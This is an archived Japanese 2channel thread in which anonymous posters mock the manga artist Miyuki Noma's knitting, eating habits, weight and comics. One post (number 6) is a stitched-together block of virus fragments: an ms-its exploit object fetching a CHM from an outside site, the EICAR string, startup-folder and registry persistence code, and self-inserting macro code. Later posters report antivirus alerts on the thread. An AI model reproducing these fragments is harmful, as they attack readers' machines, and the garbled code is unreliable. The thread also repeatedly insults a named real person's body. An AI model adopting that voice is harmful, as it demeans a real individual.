5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

野間美由紀17貫目

1 :花と名無しさん:2006/12/19(火) 08:30:37 ID:???0
前スレ
野間美由紀16貫目
http://comic6.2ch.net/test/read.cgi/gcomic/1153182376/※sage推奨

とどまることの無い食への情熱を語り合うスレです。
たまには漫画のことも語ってあげてください。
時々オカンアート攻撃が始まります。
各自武装を怠らないこと。

2 :花と名無しさん:2006/12/19(火) 10:54:53 ID:???0
>>1
乙〜

3 :花と名無しさん:2006/12/19(火) 17:19:27 ID:???0
>>1タン乙!
武装了解です(`・ω・´)シャキーン

4 :花と名無しさん:2006/12/19(火) 19:20:37 ID:???0
>>1
乙華麗!

あのオカンアート作品の数々見てると「アレらを身につけさせられて
育ったのか・・・」と息子に対して同情してしまうw

5 :花と名無しさん:2006/12/19(火) 19:47:07 ID:???0
>1タン
乙可憐!

>4
マジレスしてなんだが、
オカンアートを黙って身に着ける時期に子育てはしていないとオモ。

6 :<body onload=window()>:2006/12/19(火) 21:16:13 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

7 :花と名無しさん:2006/12/19(火) 21:56:32 ID:???0
うぎゃあああああ!!!
そんなもん友達にプレゼントすんな―――――――――っ!!!
柴田さんのを見て「プレゼントとはこういうもんだ」と思わんのかい!

8 :花と名無しさん:2006/12/19(火) 22:31:42 ID:???0
フチがヨレヨレ、編み目不ぞろい、小学生の手習いみたいな
編み物なのに、これを人様にプレゼントってマジですかーノマタン!!
これってプレゼントに出来る品質じゃないだろー?

プレーンな糸って編み目の不ぞろいさが際立つんだから、
凝った模様編みは避けたほうがいいのに。ノマタン程度の腕なら尚更
なんかねー上等のモヘアかなんかでさらっと簡単に
編んだ方が、素材感でごまかせて上手に見えるのに・・・


9 :花と名無しさん:2006/12/19(火) 22:37:49 ID:???0
野間たんって、他人への贈り物には
ほんと、お金掛けない人よね。
自分のことには無駄に無意味にお金掛けるのに。

10 :花と名無しさん:2006/12/19(火) 23:30:44 ID:???0
広瀬センセの編み物は(本人がサラっと編んでるから)
簡単そうに見えて案外難易度が高いのに……。

あと、「初めて編んでみた編み方」って慣れるまでに
時間がかかるのに、いきなり編んだものをプレゼントに
するですか。
…写真の配色見ると、紫と白に見えるんだが……いや、
着物とかの色の組み合わせでは上品で高貴な配色
らしいけど、かぎ針の模様編みでやられてもなあ。

11 :花と名無しさん:2006/12/20(水) 08:07:41 ID:???0
本に載ってないならコサージュつけるなよ。
そうすりゃ少しはマシなのに。
あのコサージュみると、シミだらけ腹と胸の部分に刺繍をあしらった
例の素敵なリフォームトーレーナーを思い出すわ。

12 :花と名無しさん:2006/12/20(水) 08:59:54 ID:???0
友達にタンスの肥やしをプレゼントしたって事でFA?

13 :花と名無しさん:2006/12/20(水) 09:37:58 ID:???0
すでに肥やしはタンスからあふれています。

14 :花と名無しさん:2006/12/20(水) 19:09:19 ID:???O
ニットの貴公子の作品も野間タンにかかればああなるのか…。
最近の作品はヲチ歴長いここの住人にも破壊力あるなー。

15 :sage:2006/12/20(水) 20:22:08 ID:ezaqvwwn0
徐々に顔の露出が増えてる

16 :花と名無しさん:2006/12/20(水) 20:22:57 ID:???0
夜中にわざわざカーテン開けて撮影ですかいw
高層がご自慢なのはわかるけど、
その帽子のセンスはわからないわ。
オカンアートを通り越してオバンアートでは?

17 :花と名無しさん:2006/12/20(水) 20:23:21 ID:ezaqvwwn0
ごめん間違えた

18 :花と名無しさん:2006/12/20(水) 20:25:04 ID:???0
これで他の方へのマフラーも編む予定
これで他の方へのマフラーも編む予定
これで他の方へのマフラーも編む予定
これで他の方へのマフラーも編む予定
これで他の方へのマフラーも編む予定

19 :花と名無しさん:2006/12/20(水) 22:27:50 ID:???0
ほほ肉がすべてを語っております

20 :花と名無しさん:2006/12/20(水) 22:43:12 ID:???0
ノマタンのお友達も色々大変ですね
あのノマタンから直々に貰ったからには、一度くらい
外で身に着けて見せなければいけないんでしょうか・・・)哀

お返しは、倍返し食い物返しが掟なのかな



21 :花と名無しさん:2006/12/20(水) 22:58:01 ID:???0
こんなひどい罰ゲームはない

22 :花と名無しさん:2006/12/20(水) 23:34:43 ID:???0
あはははは、笑える

23 :花と名無しさん:2006/12/21(木) 11:35:07 ID:???0
ミクシのお取りまきにプレゼントならいい。パンジーなんか泣いて喜びそうw

24 :花と名無しさん:2006/12/21(木) 16:36:49 ID:???0
ここの皆さんゴメンナサイ
実は自分も某通販の手作りキット(花の刺繍の壁掛け)に嵌った時期に
作った物を他人様に配りまくった事がありました・・
配った人の家に飾ってもらってはあったけど・・ハズカシス
もう二度と配るのはやめようと思いました(>д<)

25 :花と名無しさん:2006/12/21(木) 19:59:54 ID:???0
>>24
ここで謝られても……。
つ[チラシの裏]

26 :花と名無しさん:2006/12/22(金) 00:29:32 ID:???0
ノマタンが早々と仕事納めしたせいで、漫画ネタがないねえ・・・)w

それにしてもほんとにヒマだ、この人。食う寝る遊ぶアフェリ日記
いいのかこんなんで、ノマタン

27 :花と名無しさん:2006/12/22(金) 08:14:27 ID:???0
>24
壁掛けぐらいなら(って言い方も失礼だけど)いいんじゃない?
気に入ればずっと飾るし、気に入らなければ義理期間w過ぎれば
他のに変えてもかまわないことだし。
でも身に着けるもので趣味の合わないものを貰うのってほんと迷惑。
昔トメが刺繍に凝ってた頃に、目鼻のついた野菜たちが盆踊りしてるような
トートバッグ貰ってとっても困ったw

28 :花と名無しさん:2006/12/22(金) 09:46:45 ID:???0
せっかくいい立地に住んでるんだから
買い物ぐらい身体動かせばいいのに。


29 :花と名無しさん:2006/12/22(金) 22:11:16 ID:???0
>かなり悔しいです。

自分の描いてる漫画についても、このくらいのひたむきさが
あればなー
でもノマタンご紹介の編み物本、アマゾヌでレビュー見たらば
「とてもわかりやすい」です、とか書いてあった。

>自分はもしかしたら不器用なんじゃないか

うん、そうだね

30 :花と名無しさん:2006/12/22(金) 23:21:40 ID:???O
いかにも自分は不器用じゃないと言いたげな日記ですね。

31 :花と名無しさん:2006/12/22(金) 23:45:16 ID:???0
まああれだけのペースで量産できるんだから、
編む手は早いわな(自分だったらマフラー一本に
一週間はかかるし)。

…問題は配色と「飾り」のセンスなんだけど……。

32 :花と名無しさん:2006/12/23(土) 02:51:43 ID:???0
喜ばれない編物に時間費やすならもう一回漫画の勉強でもやればいいのに

昔パズルを読んだ時、化月のガッコの制服が全部手書きで模様入ってたとき
この人スクトンも買えないのかしらと思ったことがあった
線の幅が微妙に毎回違うからトーン貼っちゃえば楽だし、綺麗なのにと思ってたけど
もったいないと思ってたのだろうか


33 :花と名無しさん:2006/12/23(土) 08:51:46 ID:???O
勿体なかったかどうかは別として
それさえ楽しんで描いてる情熱を感じてたけどな、私は。
私服もファッション誌を参考に丁寧に描いてたし。


34 :花と名無しさん:2006/12/23(土) 11:12:26 ID:???0
根気があるなら痩せる努力してみろや、ヴォケ。
好きな事ならいくらでもできるってのは根気じゃねーよ。
アホか。

35 :花と名無しさん:2006/12/23(土) 12:21:47 ID:???0
>>31
いや技術も結構問題だとw
編み目酷いし
編み物好きなのはいいんだけどさ、もっと丁寧に編めば?ってオモ

豚さんの編んだマフラーを押し付けられた人は
お返しにどんな嫌がらせをするんだろうな
自分なら100円ショップで買ったジェイソンのお面でも
お返しに押し付けてやるけど
多分豚の事だから高そうなお返しが期待できる人にだけ
マフラー押し付けるんだろうなw

36 :花と名無しさん:2006/12/23(土) 14:29:52 ID:???0
>35
上3行同意。
なんか、速さ自慢してんのか?って感じ。

37 :花と名無しさん:2006/12/24(日) 13:40:03 ID:???0
1000円札一枚置いて「じゃっ」w

38 :花と名無しさん:2006/12/24(日) 20:31:07 ID:???0
大人の夜遊びって…

39 :花と名無しさん:2006/12/25(月) 19:09:02 ID:???0
年賀状と編み物にはほんとに心血を捧げるよなぁ

40 :花と名無しさん:2006/12/25(月) 19:33:17 ID:???0
メリクリのレースは蹄の作品・・・だよね?あのボコボコ具合w

41 :花と名無しさん:2006/12/26(火) 19:36:04 ID:???0
本日付産経新聞「断」より。漫画家さかもと未明氏はこう申しております。
なんとなく野間に読ませてやりたいw
――――――――――――――――――――――――――――――――――――
「申し訳ないけど、明日取材が朝からなので先に休ませてね」
 私は、寝室に入るとき必ず手伝いの女の子たちにいう。漫画の仕事は実にハードで、
徹夜で朝の6時7時になることもザラだ。そんな仕事を安いお金で手伝っていただく以上、
私は誰よりも働いて範を示し、感謝を伝えるべきことを18年の漫画家生活で学んだ。
 文字通り一番早く仕事場に入り、最後まで残るのは基本だ。そうでないと目に見えて
社員たちの生産性が落ちる。しかし、私が頑張っていると認めてくれるとき、彼女らは
驚くほどすばらしい働きをしてくれるのだ。
 上に立つものは、人格と生活を磨く事を責として負っていると思う。社員が「尊敬できる
人の下で働きたい」と願うのは当然だ。




42 :花と名無しさん:2006/12/26(火) 20:36:01 ID:???0
あたし、いまアシ使ってないから。もぐもぐ。

とか言いそうだね。

43 :花と名無しさん:2006/12/26(火) 21:03:45 ID:???0
>上に立つものは、人格と生活を磨く事を責として負っていると思う。

ポイントはやっぱりここよね。
尊敬されたがる割に(ry)な人だから。


44 :花と名無しさん:2006/12/28(木) 22:47:55 ID:???O
保守

45 :花と名無しさん:2006/12/30(土) 12:08:39 ID:???0
モチの前にイモ取り寄せ
そんなにも炭水化物が好きかーっ?!ノマタン

あ、肉と脂と糖分もか・・・

46 :花と名無しさん:2006/12/31(日) 08:52:45 ID:???O
のまたん、今年一年楽しませてくれて
ありがとう…色んな意味でw
来年も期待してます…色んな意味でw

47 :花と名無しさん:2006/12/31(日) 09:27:45 ID:???0
あたし、何もしてないけどないけど?もぐもぐ。

48 : 【末吉】   :2007/01/01(月) 04:57:03 ID:???0
あけましてもぐもぐ

49 : 【654円】 【大凶】 株価【37】 :2007/01/01(月) 09:43:23 ID:???0
今年も食いまくりw
丈夫な胃がうらやましくないw

50 : 【末吉】 【567円】 :2007/01/01(月) 16:59:40 ID:???O
なに食べてるか想像しただけでオエップ

51 : 【大凶】 【690円】 :2007/01/01(月) 17:19:06 ID:???O
ノマタンは今年痩せられますか?

52 : 【小吉】 【1184円】 株価【36】 :2007/01/01(月) 19:08:41 ID:???0
むりぽ

53 :花と名無しさん:2007/01/01(月) 20:59:16 ID:???0
体型的にも作品の劣化具合的にも、ノマの最終形態ではないかと
言われてる某温帯が、年末に体調不良で入院なされてましたな。

目眩がひどいということで、耳鼻科系のトラブルという説が濃厚の
ようですが、多方面にある温帯スレでは、住人が異句同音に
「これを機会に(医者の指導をちゃんと受け入れて)、自分の体型と
食生活を見直してくれれば」と言っておりました。

今のところノマテンテーは健康上のトラブルはないようではありますが、
ある日ドカンと来る可能性はあるわけで……御用心、つっても聞かねえ
だろうなあ、この人は。

54 :今年のノマ 【大凶】 ノマの値段 【1099円】 :2007/01/01(月) 22:38:01 ID:???0
さあどうだw

55 :ダイエット成功? !omikuji:2007/01/02(火) 08:42:16 ID:???0
>53
 降圧剤飲んでりゃ好きな物食っちゃ飲みしててもいいんだーな態度にしか
見えないノマタンも、反省して欲しいところだよな〜


56 :花と名無しさん:2007/01/02(火) 08:45:42 ID:???0
あいた・・・

57 :花と名無しさん:2007/01/03(水) 19:06:24 ID:???0
今帰省先から帰ってきて初めてブログの年賀状見たんだけど、
なんだろう・・・なにが変なんだろう・・・なんかしっくりこない・・・

ミドリと香月の遠近バランスかなぁ。
横に並べるにはしっくり来ない希ガス。


58 :花と名無しさん:2007/01/03(水) 19:08:18 ID:???0
連投スマソ。
あれは書き下ろしなのかな?
それとも別々に以前描いたものを切り貼りしたのかな?
前者だとしたら相当qあwせdrftgyふじこ


59 :花と名無しさん:2007/01/03(水) 20:28:49 ID:???0
>57
あけおめっ!
あの、首がぽろりん落ちそうなヘタレ絵ですか?
耳たぶに仁丹が貼り付いてるとしか見えないカス絵ですか?
一応書き下ろし(貼り下ろし)なんじゃないかなあー
年の初めからヤル気ナッシング

60 :花と名無しさん:2007/01/03(水) 21:02:34 ID:???0
っつーかアレ、背景がなかったら正月用の絵ってわからないよ。

61 :花と名無しさん:2007/01/03(水) 21:45:02 ID:???0
文句言うぐらいなら、オバンアートに精を出してないで
とっとと年賀状書いてりゃ良かったのにね。

62 :花と名無しさん:2007/01/03(水) 22:07:14 ID:???0
得意の切り貼りで着物貼らなかったのですねw

63 :花と名無しさん:2007/01/03(水) 23:07:37 ID:???0
旦那の実家への手土産が、自分の漫画(新刊)ってのは・・・。
土産になるのか〜?こんなもん

64 :花と名無しさん:2007/01/04(木) 07:06:55 ID:???0
かと言って、オバンアートを土産にされても。

65 :花と名無しさん:2007/01/04(木) 11:44:31 ID:???O
実際は箱入り菓子かなんかを
メインの土産にしたと思いたい。
ありえねーだろぉっ? いくら漫画家でも漫画本が土産って。

66 :花と名無しさん:2007/01/04(木) 14:37:59 ID:???0
案外用意してなくて、そこら辺の開いてる店で慌てて間に合わせたんじゃない?
でも普段エラソーにハイソぶったこと書いてるから、恥ずかしくてその部分はカットしたと。
野間ならありえそうな話だと思う。

67 :花と名無しさん:2007/01/04(木) 16:44:19 ID:???0
>>66
あわてて間に合わせるもなにも、3日にもなれば普通に都内のデパート開いてるし…。

68 :花と名無しさん:2007/01/04(木) 18:28:49 ID:???O
野間が自分の為でもなくデパートなど行かない。
道中のテケトーな店でしょ。

69 :花と名無しさん:2007/01/04(木) 19:34:08 ID:???0
30日に出して元旦につかねえからがっかり、ってどこまで自己中なのこの愚蹄目

70 :花と名無しさん:2007/01/04(木) 19:44:58 ID:???0
>69
3日になっても着いてないって書いてるよ。確かに遅い。

71 :花と名無しさん:2007/01/04(木) 22:14:59 ID:???0
ポスト出しだと遅いよ

72 :花と名無しさん:2007/01/04(木) 22:39:50 ID:???O
30日ならそんなもんだよ。

73 :花と名無しさん:2007/01/04(木) 22:57:17 ID:???0
2日は年賀状配達休みじゃなかったっけ?今は違うの?

74 :花と名無しさん:2007/01/04(木) 23:10:59 ID:???O
2日も配達するようになったよ。
去年あたりから年賀状の到着が遅いってよくきく。

75 :花と名無しさん:2007/01/05(金) 09:05:07 ID:???0
>74
そう言われてるけど現実2日に年賀状配達されてないものなぁ。
去年も今年も。

76 :花と名無しさん:2007/01/05(金) 09:37:46 ID:???0
2日、年賀状は来なかったけど普通郵便は来たよ。それもクレカの明細書w

77 :花と名無しさん:2007/01/06(土) 07:16:38 ID:???0
で、ノマタンの出した年賀状はどんな自信作だったんだ?

78 :花と名無しさん:2007/01/07(日) 12:17:28 ID:???0
のまたん、今年は“微妙に体調が悪い”原因に
ちゃんと向き合いましょうねw

79 :花と名無しさん:2007/01/07(日) 19:22:07 ID:???0
>78
まあ、ノマタンが自分の体調にしろ、漫画の質にしろ、自作手芸品にしろ
現実を直視して向き合ったら、色々ツライ事になるかと。

80 :花と名無しさん:2007/01/07(日) 19:44:01 ID:???0
いや、直視した上で「どこがイケナイの?」と思ってるフシが。
過去のBBSでそういう発言が実際あったし。

81 :花と名無しさん:2007/01/08(月) 09:52:47 ID:???0
羨ましがるほど設定に苦労してるのかと。

82 :花と名無しさん:2007/01/08(月) 10:35:58 ID:???0
>戦後すぐに書かれたミステリは戦争のどさくさを
>うまく活用しているものが多いので、
>設定が作りやすそうで羨ましいです。

なにこれ、先人に対してすっげえ失礼な言い草…


83 :花と名無しさん:2007/01/08(月) 12:34:52 ID:???O
だったら描けばいいじゃないか>戦後モノ
たとえ描く機会が与えられても
ノマタンの場合はその設定のし易さとやらが
「安易な設定」「ご都合ストーリー」にしか
ならないに100ページ豚。

84 :花と名無しさん:2007/01/08(月) 13:05:29 ID:???0
パズルに「ジュニア」、「プロフェッショナル」、「ネクストジェネレーション」、
「新パズル」など作って、随分設定では楽しただろうに…。

85 :花と名無しさん:2007/01/08(月) 13:12:28 ID:???0
>83
首もげるほど同感。
当時のミステリが「戦後のどさくさ」を使っているのは
別に設定しやすかったからではなくて、ただ発表当時の「現実」、
舞台設定としてまさに作者、読者双方において「リアル」だったからでしょ。
当時は当時なりにトリックや設定の制約があり、過去の作品を見て、
「ああ〜あの頃だったらああいうトリックや舞台設定が使えるのに…」て
思ってたと思うよ。
んでも、そこで「昔はラクそう」とか絶対に公言しなかったと思うね。


86 :花と名無しさん:2007/01/08(月) 14:12:35 ID:???0
大体、戦後すぐって、情報に恵まれていたかなぁ。
当時の「リアル」を細かいニュアンスを込めて書くことはできただろうが、
膨らみを持たせようとすると、足を使って取材を重ねなきゃならなかった
と思うが…。
横溝先生にしても奥様が取材に奔走されていたと、読んだ覚えがあるし…。
おいしい情報を多岐に渡って集められるという点では、ノマタンの方が
恵まれていると思うのだが…

87 :花と名無しさん:2007/01/08(月) 14:17:01 ID:???0
ミステリ好きを公言するわりに、敬意がないよね。
先人は、おみやげやプレゼントをくれたりしないからかな?w

88 :花と名無しさん:2007/01/08(月) 19:43:42 ID:???0
このスレになってから、見にくるたびにウイルスが検出されるんだけど・・

89 :花と名無しさん:2007/01/08(月) 20:07:56 ID:???0
ノー豚の設定で直る

90 :花と名無しさん:2007/01/09(火) 00:51:24 ID:???0
>>88
私もそう!
前半は「ウィルスブロックしました」メッセージが出て見られない
ふと「やっちゃって」を思い出しちゃったよ


91 :花と名無しさん:2007/01/09(火) 07:17:00 ID:???0
そもそも野間は本当にミステリファンなのだろうかと
常々思っている。
厨房工房ぐらいの頃はそうだったかも知れないけど
今は「ミステリファン」の聞こえがいいから乗っちゃってるふうにしか。
ミステリファンならありえない“あのフーダニット発言”もそうだし、
今回のこともありえないよ。

92 :花と名無しさん:2007/01/09(火) 10:27:14 ID:???0
「Who do it」と言ったぐらいですからw

93 :花と名無しさん:2007/01/09(火) 22:52:45 ID:???0
ドドイツ〜♪
ここでこんなに あげつられてなきゃ 野間さんすんなり 嫁ただろうに

94 :花と名無しさん:2007/01/09(火) 23:54:23 ID:???0
「毎月連載」したっていいんだよーん

95 :花と名無しさん:2007/01/10(水) 23:24:29 ID:???0
米1.5升、肉まん6個、赤飯、イモ

蒸し器一個でどこまでも膨らむ食の夢…

96 :花と名無しさん:2007/01/10(水) 23:45:31 ID:???0
あれ、どうやってコメント書いたんだ?

97 :花と名無しさん:2007/01/11(木) 08:47:21 ID:???O
携帯ならコメントできますよ。

98 :花と名無しさん:2007/01/12(金) 13:16:09 ID:???0
ノマは羨ましいばっかり言うなら、いっその事江戸時代設定で
ミステリ漫画でも書いてみろってんだ。 鑑識も個人情報保護も
加害者の人権も何も無いぞ。 今なら新年初夢オチに出来るし。

99 :花と名無しさん:2007/01/13(土) 07:50:32 ID:???O
江戸時代なんて、そもそも野間には
"描くこと"が無理ぽ。
資料を撮ってきて加工するわけにいかないし、
浮世絵に香月貼るわけにいかないし。

100 :花と名無しさん:2007/01/13(土) 10:41:03 ID:???O
江戸時代のテーマパークで取材wして、
着物コスプレした写真の首を香月にすげ替えで
ノマタンは桶だろうね。
そもそもパズルでは教室すらもう描けないのに。
どこ?あ、隅に机がある?つことは教室!って
ミステリーはそこからスタートしている。

101 :花と名無しさん:2007/01/13(土) 13:13:04 ID:???0
えーと、大江戸葉蔓捕り物帳?

いつも小うるさい知ったか町娘の香月が、ある時は大奥の御殿女中となり、
またある時は吉原の花魁となり、現場に潜入。
優れた推理力と持ち前の行動力とで江戸八百八町の闇に巣くうあらゆる
事件を解決!
時折作中に織り交ぜられる、江戸時代の「食の薀蓄」が時代物通をも
うならせる珠玉の一品。

…なんてね

102 :花と名無しさん:2007/01/13(土) 16:49:37 ID:???0
>>101の方がノマタンより文才がある

103 :花と名無しさん:2007/01/13(土) 18:19:57 ID:???0
>>101
池波正太郎とか平岩弓枝あたりでほぼ
網羅されてるジャンルだな……。

104 :花と名無しさん:2007/01/14(日) 19:32:09 ID:???0
>最近は手で文章を書く機会も減ってしまってすっかりご無沙汰。

うむ。同じく手で漫画を描く機会も

105 :花と名無しさん:2007/01/15(月) 14:22:51 ID:???0
コーヒーの福袋のやつ読んで思ったけど、
野間ってやっぱり2ちゃんねらだったりしてw
あれ、鬼女板のおとりよせスレで話題になってたもんなー。

106 :花と名無しさん:2007/01/15(月) 14:36:35 ID:???0
なんかもう、見境なくアフェリってる感じ。


107 :花と名無しさん:2007/01/15(月) 19:18:11 ID:???0
>105
そのスレじゃこんな評価ですが、野間たんはお気に入りなのねw
あ、アフェリ目的か。

850 :可愛い奥様 [sage] :2007/01/10(水) 17:54:26 ID:IgT8Z2UE
ここで話題に出た澤井珈琲ポチって
ミル付きのセット着たけど
やくもブレンドあんまりうまくないな〜後味ワル〜

868 :可愛い奥様 :2007/01/12(金) 11:21:18 ID:9M53Nw5x
>>850
私も・・・
期待はずれだったわ。
美味しいコーヒー飲みたいよ〜〜!

875 :可愛い奥様 [sage] :2007/01/12(金) 13:23:12 ID:ftYAlVyy
大や巣のCMって、でかいカブをスライスして、
それをまるでトランプのマジックのようにさらっと広げる。
というのがめっちゃ心に残ってる。

>850
なんかコーヒー板によると、あのミルがイマイチらしい。
ミルが余計にコーヒーをまずくしてるとしたら一緒に売るのは自分の首絞めてるんじゃないかと・・・。
豆も私はおいしくなかったけど。
残念ながらリピートはないな。
しばらくはブルックスでほっこりしておこう。
京都で飲んだ小川珈琲がおいしかったなあ。
通販あるみたいだけど、雰囲気が素敵だったのでプラスαされただけかもと思うと悩む。高いし。


108 :花と名無しさん:2007/01/15(月) 22:58:02 ID:???0
うわっ!最悪なカーディガンだ!
あんなの貰ったら泣いてしまう。

109 :花と名無しさん:2007/01/15(月) 23:29:06 ID:???0
なんか古臭い。60年代みたいなレトロポップでもないし、
あえて言うなら、「昭和40年代」って感じの貧乏臭さだ。

110 :花と名無しさん:2007/01/15(月) 23:31:36 ID:???0
あれだけ編み物編み物って言っておいて
今更“ゴム編み留め”が出来ないってwwwwww
好きこそ物の上手なれっていうけど
どれもこれも中途半端だね、この人。

111 :花と名無しさん:2007/01/16(火) 00:09:47 ID:???0
自分もテキトーに編物はするけどさぁ、
ゴム編み留めってそんなに難しくないと思うけど?
それもこんなに立て続けに編物してて覚えられないっていうのは
まずいんじゃないww

112 :花と名無しさん:2007/01/16(火) 01:49:29 ID:???0
カーディガン、だっさぁ!!! 罰ゲームでも着たく無い!!!

あれ、オカンアート通り越してオバアチャンアートだよ!!
なぜ、ゴム編みの部分をあの色にする?
なぜ、あのけったいなモチーフを付ける?
ゴム編み止めが出来ないのは分かったけど、編み物する人
なら普通、網目記号や止め方の載った本1冊くらい持ってない?
本を引っ張り出すのも面倒なのか、それくらい覚えて
られるわよ!!と基本の本すら持ってないのか…

漫画がヘタレて行く理由が分かる気がした。

113 :花と名無しさん:2007/01/16(火) 12:31:14 ID:???0
野間って、目立つことは好きだけど
裏の努力とか細かいフォローとか出来ないタイプなんだろうね。
そういうのが一番カッコ悪いと思うんだけどな。

114 :花と名無しさん:2007/01/16(火) 13:34:17 ID:???0
左上に見えてる裏の部分を見るとよく分かるけど
ほんとに下手だよね。
目が不揃いで。
これだけ編んでこの程度の技術、ある意味凄いと思う。

115 :花と名無しさん:2007/01/16(火) 16:13:02 ID:???0
あの「モチーフ」ってさあ……服につける飾りってよりは
コースターとか、レース糸で編んでドイリーとかにするタイプの
やつだよねえ……。
しかも、グレー系に渋いエンジで縁どりか。せめてもうちょっと
細い糸で編めば……。

毛糸の編物って、案外配色とか糸の太さとか編地で、同じものを
編んでもすっげーダサいものとすっきりカッコいいものと、キッパリ
分かれるんだよなー。
なんだかんだ言っても、ヒロセセンセとかはそのへんのセンスが
いいんだろうな、と思う。

116 :花と名無しさん:2007/01/16(火) 16:20:55 ID:???0
あんなヘンテコな「モチーフ」がついたカーディガンを着ろだなんて
罰ゲームの域を超えてます><


117 :花と名無しさん:2007/01/16(火) 17:31:43 ID:???0
ノマタン、もしかしてもう老眼かなんかか?
網目が波打ってるわ揃ってないわ……
絵が可笑しいのも、それだったら納得できる気がする。

118 :花と名無しさん:2007/01/16(火) 18:47:11 ID:???0
どんな変なモン編んだのかと思ってみたけど
あんな感じのなら、よくお婆ちゃんが着てない?
袖がなくて前を紐で結ぶやつ。

119 :花と名無しさん:2007/01/16(火) 20:30:07 ID:???0
>>118
まあね。
でもアレ「姪へのプレゼント」だからなあ…。
小学生だったっけ?

120 :花と名無しさん:2007/01/16(火) 22:35:09 ID:???0
そう、あれが小学生の女の子が着る物だと思うと
不憫さ爆発だよ。もう少し普通に可愛い物が作れないものか。
なんつうか、致命的に色彩感覚がダメだよね…まがりなりにも
漫画家なのに。ああ、いや既に漫画家未満か

121 :花と名無しさん:2007/01/17(水) 10:29:15 ID:???0
ああいうモチーフって、おばちゃんの手作り座布団
カバーとか、アクリル毛糸のタワシとかでよく見るよ。

それを「アテクシオリジナルのステキな編み図、使いたいなら
使わせてあげてもよろしくてよ。 ただし、自分の手柄に
したり、商売に使うのは許さないわっ!!」だなんて…
自分に自信があるにしても、程がある!
アレを使いたい人が、売りたい人がいると思ってるのか?!

122 :花と名無しさん:2007/01/17(水) 10:51:30 ID:???0
あんな罰ゲーム対象作品の編み図DLする人なんていませんからw
豚さん、取り越し苦労ですよ〜

123 :花と名無しさん:2007/01/17(水) 11:26:28 ID:???O
販売目的はダメとかあの大層な注意書は何?!
あんなの販売どころかブログに書くわけないじゃん!
と思ってこのスレに飛んできました。
さんざんガイシュツですいません。

124 :花と名無しさん:2007/01/17(水) 14:32:13 ID:???0
いや、他の人が編んだら(配色とかも変えてね)
結構良い物になるかも知れないよw

125 :花と名無しさん:2007/01/17(水) 16:03:03 ID:???0
>最初は、前身頃を全部モチーフで埋めることを考えていたので

……アカンわこの人……根本的にセンスねえ
こういう人が作ると、市販のテキストの通りにやってもどっかダサい
オカンアートができるのか……。

126 :花と名無しさん:2007/01/17(水) 18:52:10 ID:???0
かなり昔の話だけど、山田邦子が全盛の頃に
いいとものテレホンショッキングに出演したとき、
母親お手製の服を着てきたんだけど、
それがモチーフだけを組み合わせたツーピース+帽子で
ものすごく可愛かったんだよね。
売ってるなら欲しいぐらいだし、
それこそ編み図があったらせっせと編みたいぐらい。

で、結局はセンスってことか。


127 :花と名無しさん:2007/01/17(水) 20:49:03 ID:???0
ノマタンは自分の創作物に、他人からパクられる程の魅力があるとでも
本気で思ってるんだろうか…
手芸品にしたって漫画にしたって、二次創作してくれるファンが
付くとも思えないんだけどな


128 :花と名無しさん:2007/01/18(木) 08:13:27 ID:???0
言われてみればノマタンの同人サイトって見たことなす

129 :花と名無しさん:2007/01/18(木) 09:02:33 ID:???0
ピークの頃はインターネットがなかったからね。
ピーク時の公式ファンクラブは結構がんばってたとおもう。コミケにも出てたし。

130 :花と名無しさん:2007/01/18(木) 12:17:28 ID:???O
パズル初期にはファンクラブもなかった?
ボ〇通信?とか、うろ覚え。

131 :花と名無しさん:2007/01/18(木) 12:53:40 ID:???0
あの体たらくでボブ・・・化粧したらそっくりのドラッグクィーン思い出すw

132 :花と名無しさん:2007/01/18(木) 19:01:02 ID:???0
喜んでもらえて嬉しいのは分かるけどさぁ、
あの程度のボカシで子供の画像うpすんなよ・・・orz
野間って、昔のメアド強制の時といい
他人のプライバシーはほんとどうでもいいのね。
自分はたるんだ首から下とかしかうpしないくせに。

133 :花と名無しさん:2007/01/18(木) 19:22:47 ID:???0
ミクシではいかにも悪者な顔ごとうpしてんだけどね

134 :花と名無しさん:2007/01/18(木) 21:45:25 ID:???0
あれっぱかしの仕事から、逃避とは大笑い
しかも「食う」方に向かってるし。
今日はまた随分と、肉肉しい。野菜も食いたまえ〜ノマタン

135 :花と名無しさん:2007/01/18(木) 23:46:15 ID:???O
ま、アレだな。
燃料投下の才能だけは認めなきゃならんな。

136 :花と名無しさん:2007/01/20(土) 00:45:12 ID:???0
>ご主人の西尾拓美さんが文章、知美ちゃんが絵を描いた
>「ぐるぐるまわる」という本です。
>西尾さんの絵は本業ではないとは思えない達者さで、
>このお話にぴったりです。

あれ・・・?
堂々と間違ってるような…

137 :花と名無しさん:2007/01/20(土) 01:55:20 ID:???0
西尾知美が本名だったら、
間違いではないね。

でも、この流れだったら、「知美ちゃん」だよね。
指摘されたら上記のように言うんだろうけどw

138 :花と名無しさん:2007/01/20(土) 10:32:49 ID:???0
>137
いや、絵を描いたのが旦那さんの方かと。

139 :花と名無しさん:2007/01/20(土) 11:11:02 ID:???0
http://www.nihonbungeisha.co.jp/guruguru/index.html

知美さんが文、西尾氏が絵だね。

140 :花と名無しさん:2007/01/20(土) 13:50:50 ID:???0
これをきっかけに知美ダンナがデビューすれば面白いのになw

